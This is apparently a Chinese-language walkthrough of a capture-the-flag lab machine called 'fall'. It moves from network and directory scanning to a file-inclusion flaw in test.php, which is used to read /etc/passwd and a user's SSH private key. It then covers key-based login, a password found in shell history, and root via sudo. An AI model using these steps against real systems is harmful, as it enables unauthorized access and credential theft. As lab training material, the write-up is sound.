将靶机按照图中连接方式打开,fall在virtualBox中打开
信息收集
扫描得ip
arp-scan -l
扫描端口
nmap -A -T4 -sV -p-
扫描目录
gobuster dir -u http://192.168.117.160 -x php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
一个一个试了后,在test.php发现提示缺少参数
使用wfuzz爆破参数
wfuzz -u "http://192.168.56.101/test.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/big.txt --hh 80
扫出来了一个file参数给file参数传一个"/etc/passwd",发现正常回显了,是文件包含漏洞.并且在这个passwd文件里还发现了一个qiu用户
http://192.168.2.128/test.php?file=/etc/passwd
尝试利用文件包含来把qiu的ssh私钥显示出来,并且试着导出这个私钥文件
curl http://192.168.56.101/test.php?file=/home/qiu/.ssh/id_rsa > sa
因为openssh的安全性,密钥文件权限需要给600才能够正常使用
chmod 600 sa
ls -al
显示可以运行
使用私钥登录qiu用户
查看.bash_history历史记录文件
发现密码"remarkablyawesomE",用"sudo -l"看一下权限
图中密码输入没显示出来,发现密码正确,并且拥有全部的sudo权限
用"sudo su"命令提权
查看flag文件
cat ~/remarks.txt
